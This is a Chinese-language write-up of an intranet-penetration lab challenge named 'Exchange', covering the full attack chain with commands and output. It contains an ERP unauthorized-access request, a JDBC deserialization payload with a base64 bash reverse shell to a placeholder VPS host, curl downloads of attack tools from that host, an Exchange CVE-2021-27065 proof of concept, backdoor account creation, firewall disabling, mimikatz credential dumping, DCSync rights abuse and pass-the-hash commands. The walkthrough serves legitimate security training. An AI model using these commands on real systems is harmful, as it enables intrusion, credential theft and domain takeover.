本文最后更新于390 天前,其中的信息可能已经过时,如有错误请发送邮件到1714510997@qq.com
0x00前言
Exchange 是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有 4 个 Flag,分布于不同的靶机。
0x01外网打点
拿到靶机先走一走老流程
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 39.101.137.97 is alive
[*] Icmp alive hosts len is: 1
39.101.137.97:80 open
39.101.137.97:8000 open
39.101.137.97:22 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle: http://39.101.137.97 code:200 len:19813 title:lumia
[*] WebTitle: http://39.101.137.97:8000 code:302 len:0 title:None 跳转url: http://39.101.137.97:8000/login.html
[*] WebTitle: http://39.101.137.97:8000/login.html code:200 len:5662 title:Lumia ERP
已完成 3/3
[*] 扫描结束,耗时: 1m1.633054679s扫出来一个8000端口,访问一下,再拿着这个ERP搜索很容易找到了他的漏洞
华夏ERP未授权
访问
/user/getAllList;.ico可以拿到所有账号和密码的md5值,包括管理员
{"code":200,"data":{"userList":[{"id":63,"username":"季圣华","loginName":"jsh","password":"e10adc3949ba59abbe56e057f20f883e","position":"","department":null,"email":"","phonenum":"","ismanager":1,"isystem":1,"status":0,"description":"","remark":null,"tenantId":63},{"id":120,"username":"管理员","loginName":"admin","password":"e10adc3949ba59abbe56e057f20f883e","position":null,"department":null,"email":null,"phonenum":null,"ismanager":1,"isystem":0,"status":0,"description":null,"remark":null,"tenantId":null},{"id":131,"username":"测试用户","loginName":"test123","password":"e10adc3949ba59abbe56e057f20f883e","position":"","department":null,"email":"","phonenum":"","ismanager":1,"isystem":0,"status":0,"description":"","remark":null,"tenantId":63}]}}
拿着解码一下登录后台,但是并没有什么用,上传插件那个漏洞在这里也是行不通的
JDBC RCE
虽然没有上传插件的RCE,但是可以通过打JDBC,这里需要用到一个工具MySQL_Fake_Server_master
首先修改一下config.json
{
"config":{
"ysoserialPath":"ysoserial-all.jar",
"javaBinPath":"java",
"fileOutputDir":"./fileOutput/",
"displayFileContentOnScreen":true,
"saveToFile":true
},
"fileread":{
"win_ini":"c:\\windows\\win.ini",
"win_hosts":"c:\\windows\\system32\\drivers\\etc\\hosts",
"win":"c:\\windows\\",
"linux_passwd":"/etc/passwd",
"linux_hosts":"/etc/hosts",
"index_php":"index.php",
"ssrf":"https://www.baidu.com/",
"__defaultFiles":["/etc/hosts","c:\\windows\\system32\\drivers\\etc\\hosts"]
},
"yso":{
"Jdk7u21":["Jdk7u21","calc"],
"CommonsCollections6":["CommonCollections6","bash -c {echo,payload}|{base64,-d}|{bash,-i}"]
}
}payload那里换成反弹shell的payload
然后运行
python3 server.py最终的exp
{ "name": { "@type": "java.lang.AutoCloseable", "@type": "com.mysql.jdbc.JDBC4Connection", "hostToConnectTo": "VPS-IP", "portToConnectTo": 3306, "info": { "user": "yso_CommonsCollections6_bash -c {echo,payload}|{base64,-d}|{bash,-i}", "password": "pass", "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor", "autoDeserialize": "true", "NUM_HOSTS": "1" } }同样把里面的payload和vpsip替换成自己的,而且要url编码,随便在一处查询的地方抓包,把depotHead路由替换成user路由
在自己的vps上用nc反弹shell就行了
0x02内网渗透
内网信息收集
老流程了,从vps上把fscan和chisel拉下来
python3 -m http.server 8001
curl -o chisel http://vps:8001/chisel
curl -o fscan_amd64 http://vps:8001/fscan_amd64
chmod +x chisel
chmod +x fscan_amd64先看看ip
ifconfig
eth0 Link encap:Ethernet HWaddr 00:16:3e:0e:c0:cb
inet addr:172.22.3.12 Bcast:172.22.255.255 Mask:255.255.0.0
inet6 addr: fe80::216:3eff:fe0e:c0cb/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:138716 errors:0 dropped:0 overruns:0 frame:0
TX packets:35423 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:179907335 (179.9 MB) TX bytes:17672898 (17.6 MB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:5024 errors:0 dropped:0 overruns:0 frame:0
TX packets:5024 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:1144685 (1.1 MB) TX bytes:1144685 (1.1 MB)然后扫内网
(icmp) Target 172.22.3.12 is alive
(icmp) Target 172.22.3.26 is alive
(icmp) Target 172.22.3.9 is alive
(icmp) Target 172.22.3.2 is alive
(icmp) Target 172.22.255.253 is alive
[*] LiveTop 172.22.0.0/16 段存活数量为: 5
[*] LiveTop 172.22.3.0/24 段存活数量为: 4
[*] Icmp alive hosts len is: 5
[*] LiveTop 172.22.255.0/24 段存活数量为: 1
172.22.3.9:139 open
172.22.3.2:445 open
172.22.3.9:445 open
172.22.3.26:445 open
172.22.3.9:443 open
172.22.3.2:139 open
172.22.3.26:139 open
172.22.3.2:135 open
172.22.3.9:135 open
172.22.3.26:135 open
172.22.3.9:81 open
172.22.3.9:80 open
172.22.3.9:808 open
172.22.3.2:88 open
172.22.3.9:8172 open
[*] alive ports len is: 15
start vulscan
[*] NetInfo:
[*]172.22.3.2
[->]XIAORANG-WIN16
[->]172.22.3.2
[*] NetInfo:
[*]172.22.3.9
[->]XIAORANG-EXC01
[->]172.22.3.9
[*] NetBios: 172.22.3.26 XIAORANG\XIAORANG-PC
[*] 172.22.3.2 (Windows Server 2016 Datacenter 14393)
[*] NetInfo:
[*]172.22.3.26
[->]XIAORANG-PC
[->]172.22.3.26
[*] NetBios: 172.22.3.2 [+]DC XIAORANG-WIN16.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios: 172.22.3.9 XIAORANG-EXC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] WebTitle: http://172.22.3.9:81 code:403 len:1157 title:403 - 禁止访问: 访问被拒绝。
[*] WebTitle: https://172.22.3.9:8172 code:404 len:0 title:None
[*] WebTitle: http://172.22.3.9 code:403 len:0 title:None
[*] WebTitle: https://172.22.3.9 code:302 len:0 title:None 跳转url: https://172.22.3.9/owa/
[*] WebTitle: https://172.22.3.9/owa/auth/logon.aspx?url=https%3a%2f%2f172.22.3.9%2fowa%2f&reason=0 code:200 len:28237 title:Outlook
已完成 15/15
[*] 扫描结束,耗时: 20.604560097s172.22.3.12 已控制
172.22.3.2 DC
172.22.3.9 Exchange Server 2016
172.22.3.26 XIAORANG-PCchisel搭建代理
./chisel client vps:1234 R:0.0.0.0:1080:socks
./chisel server -p 1234 --reverse
Exchange Server 2016 RCE
访问172.22.3.9发现是Exchange Server 2016可以利用CVE-2021-27065直接RCE,前提是要知道用户名,一般来说都是administrator@doamin,如果不知道可以通过CVE-2021-26855(SSRF)获取到
这里用户名肯定就是administrator@xiaorang.lab,直接用现成的POC打
proxychains4 python2 poc.py 172.22.3.9 administrator@xiaorang.lab
先添加一个用户,然后RDP上去方便后面的操作
net user yuyulin qwer1234! /add
net localgroup administrators yuyulin /add如果远程端口3389没开,那就用下面的命令
// 受害机执行允许远程访问的命令
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
// 受害机开启3389端口
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f
net stop TermService
net start TermService
// 直接关掉防火墙
netsh advfirewall set allprofiles state off
成功拿下第二个flag
writeDacl写DCSync
上传一个mimikatz.exe抓一下用户密码
privilege::debug
sekurlsa::logonpasswords
exit有用的就是下面两个
Zhangtong 22c7f81993e96ac83ac2f3f1903de8b4
XIAORANG-EXC01$ d25d67d44c0e897177429cae64b7517f然后再传一个SharpHound.exe
SharpHound.exe -c all这里遇到了一个问题,我一开始是在cmd里面直接运行,但是他会报错连不上LDAP,就抓不了信息,于是直接管理员运行,但是我运行了好几次只成功了一次,大多数时候都一直卡在那里
放一张别人完整的生成图,原文链接:https://exp10it.io/2023/08/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-exchange-writeup/#flag04
定位到Exchange这个机器,发现他对域内用户具有WriteDacl
WriteDacl :可写入目标DACL,修改DACL访问权,即是说可以利用WriteDacl权限添加Zhangtong的DCSync权限
需要用到https://github.com/ThePorgs/impacket
proxychains4 python3 dacledit.py xiaorang.lab/XIAORANG-EXC01\$ -hashes :d25d67d44c0e897177429cae64b7517f -action write -rights DCSync -principal Zhangtong -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.3.2但是这里有一个坑
我们需要把msada_guids.py复制到当前目录下,然后修改dacledit.py中第三十九行,把impacket.去掉就能正常运行了
抓取域控hash
proxychains4 python3 secretsdump.py xiaorang.lab/Zhangtong@172.22.3.2 -hashes :22c7f81993e96ac83ac2f3f1903de8b4 -just-dc-ntlm
然后pth就可以拿到第三个flag了
proxychains4 python3 wmiexec.py xiaorang.lab/Administrator@172.22.3.2 -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb -dc-ip 172.22.3.2 -codec gbk
0x03域内横向
先说最后一个flag在哪里,最后一个flag不在172.22.3.26的本地管理员那里,我们要登录lumia这个账户
登录域控
这个应该是最直观的方法,之前我们注册了一个账号,我们把这个账号添加到DC的Administrator
net localgroup "Administrators" /add xiaorang.lab\yuyulin然后用这个账号登录DC,修改lumia这个账号的密码
然后就可以登录lumia这个账号,在他的桌面有一个压缩包secret.zip需要密码,里面就是最后一个flag
我们再用lumia这个账号登录exchange,在他的邮箱里面有一个csv文件和一个提示,提示我们密码就是电话号码
剩下就很简单了,直接把电话号码拿来爆破就好了
smbexec横向
还可以直接用smbexec横向
proxychains4 python3 smbexec.py -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb xiaorang.lab/administrator@172.22.3.26 -codec gbk但是administrator是没有flag的,要借助https://github.com/Jumbo-WJB/PTH_Exchange这个工具来导出里面的全部邮件及其附件
proxychains4 python3 pthexchange.py --target https://172.22.3.9/ --username Lumia --password '00000000000000000000000000000000:862976f8b23c13529c2fb1428e710296' --action Download剩下的和之前一样就不多说了